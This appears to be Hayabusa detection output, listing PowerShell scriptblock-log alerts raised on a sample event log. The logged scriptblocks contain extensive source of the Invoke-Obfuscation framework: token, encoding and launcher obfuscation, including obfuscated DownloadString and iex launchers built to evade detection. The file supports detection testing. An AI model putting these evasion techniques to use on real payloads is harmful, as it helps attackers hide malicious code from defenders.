If($PowerShellClip.Contains('""')) { $PowerShellClip = $PowerShellClip.Replace('""','\""') } Return $PowerShellClip }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"$LoadClipboardClassOption = ""Add-Type $AssemblyNameFlag PresentationCore"" $GetClipboardContentsOption = ""([$WindowsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } 2 { $LoadClipboardClassOption = ""Add-Type $AssemblyNameFlag System.Windows.Forms"" $GetClipboardContentsOption = ""([$WindowsFormsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsFormsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } 3 { $LoadClipboardClassOption = (Get-Random -Input @('[Void]','$NULL=',""`$$RandomVarName="")) + ""[$ReflectionAssembly]::LoadWithPartialName('System.Windows.Forms')"" $GetClipboardContentsOption = ""([$WindowsFormsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsFormsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } default {Write-Error ""An invalid RandomClipSyntaxValue value ($RandomClipSyntaxValue) was passed to switch block for Out-RandomClipboardInvokeSyntax.""; Exit;} } # Generate syntax options for invoking clipboard contents, including numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. 
$ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariables # Generate random invoke operation syntax. # 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. $ExpressionToInvoke = $GetClipboardContentsOption If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Set final syntax for invoking clipboard contents. $PowerShellClip = $LoadClipboardClassOption + ' '*(Get-Random -Minimum 0 -Maximum 3) + ';' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $InvokeOption # Add syntax for clearing clipboard contents. 
$PowerShellClip = $PowerShellClip + ' '*(Get-Random -Minimum 0 -Maximum 3) + ';' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ClearClipboardOption # Run through all relevant token obfuscation functions except Type since it causes error for direct type casting relevant classes in a non-interactive PowerShell session. $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Member' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Member' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Command' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'CommandArgument' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Variable' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'String' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'RandomWhitespace' # For obfuscated commands generated for $PowerShellClip syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($PowerShellClip.Contains(""$Char"")) { $PowerShellClip = $PowerShellClip.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. If($PowerShellClip.Contains('""')) { $PowerShellClip = $PowerShellClip.Replace('""','\""') } Return $PowerShellClip }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. 
# # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Invoke-Obfuscation { <# .SYNOPSIS Master function that orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents. Interactive mode enables one to explore all available obfuscation functions and apply them incrementally to input PowerShell script block or script path contents. Invoke-Obfuscation Function: Invoke-Obfuscation Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Show-AsciiArt, Show-HelpMenu, Show-Menu, Show-OptionsMenu, Show-Tutorial and Out-ScriptContents (all located in Invoke-Obfuscation.ps1) Optional Dependencies: None .DESCRIPTION Invoke-Obfuscation orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments and common parent-child process relationships. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER ScriptPath Specifies the path to your payload (can be local file, UNC-path, or remote URI). .PARAMETER Command Specifies the obfuscation commands to run against the input ScriptBlock or ScriptPath parameter. 
.PARAMETER NoExit (Optional - only works if Command is specified) Outputs the option to not exit after running obfuscation commands defined in Command parameter. .PARAMETER Quiet (Optional - only works if Command is specified) Outputs the option to output only the final obfuscated result via stdout. .EXAMPLE C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -NoExit C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -Quiet C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -NoExit -Quiet .NOTES Invoke-Obfuscation orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'ScriptBlock')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [String] $ScriptPath, [String] $Command, [Switch] $NoExit, [Switch] $Quiet ) # Define variables for CLI functionality. $Script:CliCommands = @() $Script:CompoundCommand = @() $Script:QuietWasSpecified = $FALSE $CliWasSpecified = $FALSE $NoExitWasSpecified = $FALSE # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['ScriptBlock']) { $Script:CliCommands += ('set scriptblock ' + [String]$ScriptBlock) } If($PSBoundParameters['ScriptPath']) { $Script:CliCommands += ('set scriptpath ' + $ScriptPath) } # Append Command to CliCommands if specified by user input. If($PSBoundParameters['Command']) { $Script:CliCommands += $Command.Split(',') $CliWasSpecified = $TRUE If($PSBoundParameters['NoExit']) { $NoExitWasSpecified = $TRUE } If($PSBoundParameters['Quiet']) { # Create empty Write-Host and Start-Sleep proxy functions to cause any Write-Host or Start-Sleep invocations to not do anything until non-interactive -Command values are finished being processed. Function Write-Host {} Function Start-Sleep {} $Script:QuietWasSpecified = $TRUE } } ######################################## ## Script-wide variable instantiation ## ######################################## # Script-level array of Show Options menu, set as SCRIPT-level so it can be set from within any of the functions. # Build out menu for Show Options selection from user in Show-OptionsMenu menu. 
$Script:ScriptPath = '' $Script:ScriptBlock = '' $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:ObfuscatedCommand = '' $Script:ObfuscatedCommandHistory = @() $Script:ObfuscationLength = '' $Script:OptionsMenu = @() $Script:OptionsMenu += , @('ScriptPath ' , $Script:ScriptPath , $TRUE) $Script:OptionsMenu += , @('ScriptBlock' , $Script:ScriptBlock , $TRUE) $Script:OptionsMenu += , @('CommandLineSyntax' , $Script:CliSyntax , $FALSE) $Script:OptionsMenu += , @('ExecutionCommands' , $Script:ExecutionCommands, $FALSE) $Script:OptionsMenu += , @('ObfuscatedCommand' , $Script:ObfuscatedCommand, $FALSE) $Script:OptionsMenu += , @('ObfuscationLength' , $Script:ObfuscatedCommand, $FALSE) # Build out $SetInputOptions from above items set as $TRUE (as settable). $SettableInputOptions = @() ForEach($Option in $Script:OptionsMenu) { If($Option[2]) {$SettableInputOptions += ([String]$Option[0]).ToLower().Trim()} } # Script-level variable for whether LAUNCHER has been applied to current ObfuscatedToken. $Script:LauncherApplied = $FALSE # Ensure Invoke-Obfuscation module was properly imported before continuing. If(!(Get-Module Invoke-Obfuscation | Where-Object {$_.ModuleType -eq 'Manifest'})) { $PathTopsd1 = ""$ScriptDir\Invoke-Obfuscation.psd1"" If($PathTopsd1.Contains(' ')) {$PathTopsd1 = '""' + $PathTopsd1 + '""'} Write-Host ""`n`nERROR: Invoke-Obfuscation module is not loaded. You must run:"" -ForegroundColor Red Write-Host "" Import-Module $PathTopsd1`n`n"" -ForegroundColor Yellow Exit } # Maximum size for cmd.exe and clipboard. $CmdMaxLength = 8190 # Build interactive menus. $LineSpacing = '[*] ' # Main Menu. 
$MenuLevel = @() $MenuLevel+= , @($LineSpacing, 'TOKEN' , 'Obfuscate PowerShell command ') $MenuLevel+= , @($LineSpacing, 'STRING' , 'Obfuscate entire command as a ') $MenuLevel+= , @($LineSpacing, 'ENCODING' , 'Obfuscate entire command via ') $MenuLevel+= , @($LineSpacing, 'LAUNCHER' , 'Obfuscate command args w/ techniques (run once at end)') # Main\Token Menu. $MenuLevel_Token = @() $MenuLevel_Token += , @($LineSpacing, 'STRING' , 'Obfuscate tokens (suggested to run first)') $MenuLevel_Token += , @($LineSpacing, 'COMMAND' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'ARGUMENT' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'MEMBER' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'VARIABLE' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'TYPE ' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'COMMENT' , 'Remove all tokens') $MenuLevel_Token += , @($LineSpacing, 'WHITESPACE' , 'Insert random (suggested to run last)') $MenuLevel_Token += , @($LineSpacing, 'ALL ' , 'Select choices from above (random order)') $MenuLevel_Token_String = @() $MenuLevel_Token_String += , @($LineSpacing, '1' , ""Concatenate --> e.g. <('co'+'ffe'+'e')>"" , @('Out-ObfuscatedTokenCommand', 'String', 1)) $MenuLevel_Token_String += , @($LineSpacing, '2' , ""Reorder --> e.g. <('{1}{0}'-f'ffee','co')>"" , @('Out-ObfuscatedTokenCommand', 'String', 2)) $MenuLevel_Token_Command = @() $MenuLevel_Token_Command += , @($LineSpacing, '1' , 'Ticks --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'Command', 1)) $MenuLevel_Token_Command += , @($LineSpacing, '2' , ""Splatting + Concatenate --> e.g. <&('Ne'+'w-Ob'+'ject')>"" , @('Out-ObfuscatedTokenCommand', 'Command', 2)) $MenuLevel_Token_Command += , @($LineSpacing, '3' , ""Splatting + Reorder --> e.g. <&('{1}{0}'-f'bject','New-O')>"" , @('Out-ObfuscatedTokenCommand', 'Command', 3)) $MenuLevel_Token_Argument = @() $MenuLevel_Token_Argument += , @($LineSpacing, '1' , 'Random Case --> e.g. 
' , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 1)) $MenuLevel_Token_Argument += , @($LineSpacing, '2' , 'Ticks --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 2)) $MenuLevel_Token_Argument += , @($LineSpacing, '3' , ""Concatenate --> e.g. <('Ne'+'t.We'+'bClient')>"" , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 3)) $MenuLevel_Token_Argument += , @($LineSpacing, '4' , ""Reorder --> e.g. <('{1}{0}'-f'bClient','Net.We')>"" , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 4)) $MenuLevel_Token_Member = @() $MenuLevel_Token_Member += , @($LineSpacing, '1' , 'Random Case --> e.g. '",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Invoke-Obfuscation { <# .SYNOPSIS Master function that orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents. Interactive mode enables one to explore all available obfuscation functions and apply them incrementally to input PowerShell script block or script path contents. 
Invoke-Obfuscation Function: Invoke-Obfuscation Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Show-AsciiArt, Show-HelpMenu, Show-Menu, Show-OptionsMenu, Show-Tutorial and Out-ScriptContents (all located in Invoke-Obfuscation.ps1) Optional Dependencies: None .DESCRIPTION Invoke-Obfuscation orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments and common parent-child process relationships. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER ScriptPath Specifies the path to your payload (can be local file, UNC-path, or remote URI). .PARAMETER Command Specifies the obfuscation commands to run against the input ScriptBlock or ScriptPath parameter. .PARAMETER NoExit (Optional - only works if Command is specified) Outputs the option to not exit after running obfuscation commands defined in Command parameter. .PARAMETER Quiet (Optional - only works if Command is specified) Outputs the option to output only the final obfuscated result via stdout. .EXAMPLE C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -NoExit C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -Quiet C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -NoExit -Quiet .NOTES Invoke-Obfuscation orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'ScriptBlock')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [String] $ScriptPath, [String] $Command, [Switch] $NoExit, [Switch] $Quiet ) # Define variables for CLI functionality. $Script:CliCommands = @() $Script:CompoundCommand = @() $Script:QuietWasSpecified = $FALSE $CliWasSpecified = $FALSE $NoExitWasSpecified = $FALSE # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['ScriptBlock']) { $Script:CliCommands += ('set scriptblock ' + [String]$ScriptBlock) } If($PSBoundParameters['ScriptPath']) { $Script:CliCommands += ('set scriptpath ' + $ScriptPath) } # Append Command to CliCommands if specified by user input. 
If($PSBoundParameters['Command']) { $Script:CliCommands += $Command.Split(',') $CliWasSpecified = $TRUE If($PSBoundParameters['NoExit']) { $NoExitWasSpecified = $TRUE } If($PSBoundParameters['Quiet']) { # Create empty Write-Host and Start-Sleep proxy functions to cause any Write-Host or Start-Sleep invocations to not do anything until non-interactive -Command values are finished being processed. Function Write-Host {} Function Start-Sleep {} $Script:QuietWasSpecified = $TRUE } } ######################################## ## Script-wide variable instantiation ## ######################################## # Script-level array of Show Options menu, set as SCRIPT-level so it can be set from within any of the functions. # Build out menu for Show Options selection from user in Show-OptionsMenu menu. $Script:ScriptPath = '' $Script:ScriptBlock = '' $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:ObfuscatedCommand = '' $Script:ObfuscatedCommandHistory = @() $Script:ObfuscationLength = '' $Script:OptionsMenu = @() $Script:OptionsMenu += , @('ScriptPath ' , $Script:ScriptPath , $TRUE) $Script:OptionsMenu += , @('ScriptBlock' , $Script:ScriptBlock , $TRUE) $Script:OptionsMenu += , @('CommandLineSyntax' , $Script:CliSyntax , $FALSE) $Script:OptionsMenu += , @('ExecutionCommands' , $Script:ExecutionCommands, $FALSE) $Script:OptionsMenu += , @('ObfuscatedCommand' , $Script:ObfuscatedCommand, $FALSE) $Script:OptionsMenu += , @('ObfuscationLength' , $Script:ObfuscatedCommand, $FALSE) # Build out $SetInputOptions from above items set as $TRUE (as settable). $SettableInputOptions = @() ForEach($Option in $Script:OptionsMenu) { If($Option[2]) {$SettableInputOptions += ([String]$Option[0]).ToLower().Trim()} } # Script-level variable for whether LAUNCHER has been applied to current ObfuscatedToken. $Script:LauncherApplied = $FALSE # Ensure Invoke-Obfuscation module was properly imported before continuing. 
If(!(Get-Module Invoke-Obfuscation | Where-Object {$_.ModuleType -eq 'Manifest'})) { $PathTopsd1 = ""$ScriptDir\Invoke-Obfuscation.psd1"" If($PathTopsd1.Contains(' ')) {$PathTopsd1 = '""' + $PathTopsd1 + '""'} Write-Host ""`n`nERROR: Invoke-Obfuscation module is not loaded. You must run:"" -ForegroundColor Red Write-Host "" Import-Module $PathTopsd1`n`n"" -ForegroundColor Yellow Exit } # Maximum size for cmd.exe and clipboard. $CmdMaxLength = 8190 # Build interactive menus. $LineSpacing = '[*] ' # Main Menu. $MenuLevel = @() $MenuLevel+= , @($LineSpacing, 'TOKEN' , 'Obfuscate PowerShell command ') $MenuLevel+= , @($LineSpacing, 'STRING' , 'Obfuscate entire command as a ') $MenuLevel+= , @($LineSpacing, 'ENCODING' , 'Obfuscate entire command via ') $MenuLevel+= , @($LineSpacing, 'LAUNCHER' , 'Obfuscate command args w/ techniques (run once at end)') # Main\Token Menu. $MenuLevel_Token = @() $MenuLevel_Token += , @($LineSpacing, 'STRING' , 'Obfuscate tokens (suggested to run first)') $MenuLevel_Token += , @($LineSpacing, 'COMMAND' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'ARGUMENT' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'MEMBER' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'VARIABLE' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'TYPE ' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'COMMENT' , 'Remove all tokens') $MenuLevel_Token += , @($LineSpacing, 'WHITESPACE' , 'Insert random (suggested to run last)') $MenuLevel_Token += , @($LineSpacing, 'ALL ' , 'Select choices from above (random order)') $MenuLevel_Token_String = @() $MenuLevel_Token_String += , @($LineSpacing, '1' , ""Concatenate --> e.g. <('co'+'ffe'+'e')>"" , @('Out-ObfuscatedTokenCommand', 'String', 1)) $MenuLevel_Token_String += , @($LineSpacing, '2' , ""Reorder --> e.g. 
<('{1}{0}'-f'ffee','co')>"" , @('Out-ObfuscatedTokenCommand', 'String', 2)) $MenuLevel_Token_Command = @() $MenuLevel_Token_Command += , @($LineSpacing, '1' , 'Ticks --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'Command', 1)) $MenuLevel_Token_Command += , @($LineSpacing, '2' , ""Splatting + Concatenate --> e.g. <&('Ne'+'w-Ob'+'ject')>"" , @('Out-ObfuscatedTokenCommand', 'Command', 2)) $MenuLevel_Token_Command += , @($LineSpacing, '3' , ""Splatting + Reorder --> e.g. <&('{1}{0}'-f'bject','New-O')>"" , @('Out-ObfuscatedTokenCommand', 'Command', 3)) $MenuLevel_Token_Argument = @() $MenuLevel_Token_Argument += , @($LineSpacing, '1' , 'Random Case --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 1)) $MenuLevel_Token_Argument += , @($LineSpacing, '2' , 'Ticks --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 2)) $MenuLevel_Token_Argument += , @($LineSpacing, '3' , ""Concatenate --> e.g. <('Ne'+'t.We'+'bClient')>"" , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 3)) $MenuLevel_Token_Argument += , @($LineSpacing, '4' , ""Reorder --> e.g. <('{1}{0}'-f'bClient','Net.We')>"" , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 4)) $MenuLevel_Token_Member = @() $MenuLevel_Token_Member += , @($LineSpacing, '1' , 'Random Case --> e.g. '",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,", @('Out-ObfuscatedTokenCommand', 'Member', 1)) $MenuLevel_Token_Member += , @($LineSpacing, '2' , 'Ticks --> e.g. 
' , @('Out-ObfuscatedTokenCommand', 'Member', 2)) $MenuLevel_Token_Member += , @($LineSpacing, '3' , ""Concatenate --> e.g. <('dOwnLo'+'AdsT'+'Ring').Invoke()>"" , @('Out-ObfuscatedTokenCommand', 'Member', 3)) $MenuLevel_Token_Member += , @($LineSpacing, '4' , ""Reorder --> e.g. <('{1}{0}'-f'dString','Downloa').Invoke()>"" , @('Out-ObfuscatedTokenCommand', 'Member', 4)) $MenuLevel_Token_Variable = @() $MenuLevel_Token_Variable += , @($LineSpacing, '1' , 'Random Case + {} + Ticks --> e.g. <${c`hEm`eX}>' , @('Out-ObfuscatedTokenCommand', 'Variable', 1)) $MenuLevel_Token_Type = @() $MenuLevel_Token_Type += , @($LineSpacing, '1' , ""Type Cast + Concatenate --> e.g. <[Type]('Con'+'sole')>"" , @('Out-ObfuscatedTokenCommand', 'Type', 1)) $MenuLevel_Token_Type += , @($LineSpacing, '2' , ""Type Cast + Reordered --> e.g. <[Type]('{1}{0}'-f'sole','Con')>"" , @('Out-ObfuscatedTokenCommand', 'Type', 2)) $MenuLevel_Token_Whitespace = @() $MenuLevel_Token_Whitespace += , @($LineSpacing, '1' , ""`tRandom Whitespace --> e.g. <.( 'Ne' +'w-Ob' + 'ject')>"" , @('Out-ObfuscatedTokenCommand', 'RandomWhitespace', 1)) $MenuLevel_Token_Comment = @() $MenuLevel_Token_Comment += , @($LineSpacing, '1' , ""Remove Comments --> e.g. self-explanatory"" , @('Out-ObfuscatedTokenCommand', 'Comment', 1)) $MenuLevel_Token_All = @() $MenuLevel_Token_All += , @($LineSpacing, '1' , ""`tExecute Token obfuscation techniques (random order)"" , @('Out-ObfuscatedTokenCommandAll', '', '')) # Main\String Menu. $MenuLevel_String = @() $MenuLevel_String += , @($LineSpacing, '1' , ' entire command' , @('Out-ObfuscatedStringCommand', '', 1)) $MenuLevel_String += , @($LineSpacing, '2' , ' entire command after concatenating' , @('Out-ObfuscatedStringCommand', '', 2)) $MenuLevel_String += , @($LineSpacing, '3' , ' entire command after concatenating' , @('Out-ObfuscatedStringCommand', '', 3)) # Main\Encoding Menu. 
$MenuLevel_Encoding = @() $MenuLevel_Encoding += , @($LineSpacing, '1' , ""`tEncode entire command as "" , @('Out-EncodedAsciiCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '2' , ""`tEncode entire command as "" , @('Out-EncodedHexCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '3' , ""`tEncode entire command as "" , @('Out-EncodedOctalCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '4' , ""`tEncode entire command as "" , @('Out-EncodedBinaryCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '5' , ""`tEncrypt entire command as (AES)"" , @('Out-SecureStringCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '6' , ""`tEncode entire command as "" , @('Out-EncodedBXORCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '7' , ""`tEncode entire command as "" , @('Out-EncodedSpecialCharOnlyCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '8' , ""`tEncode entire command as "" , @('Out-EncodedWhitespaceCommand' , '', '')) # Main\Launcher Menu. 
$MenuLevel_Launcher = @() $MenuLevel_Launcher += , @($LineSpacing, 'PS' , ""`t"") $MenuLevel_Launcher += , @($LineSpacing, 'CMD' , ' + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'WMIC' , ' + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'RUNDLL' , ' + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'VAR+' , 'Cmd + set && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'STDIN+' , 'Cmd + | PowerShell - (stdin)') $MenuLevel_Launcher += , @($LineSpacing, 'CLIP+' , 'Cmd + | Clip && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'VAR++' , 'Cmd + set && Cmd && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'STDIN++' , 'Cmd + set && Cmd | PowerShell - (stdin)') $MenuLevel_Launcher += , @($LineSpacing, 'CLIP++' , 'Cmd + | Clip && Cmd && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'RUNDLL++' , 'Cmd + set Var && && PowerShell iex Var') $MenuLevel_Launcher += , @($LineSpacing, 'MSHTA++' , 'Cmd + set Var && 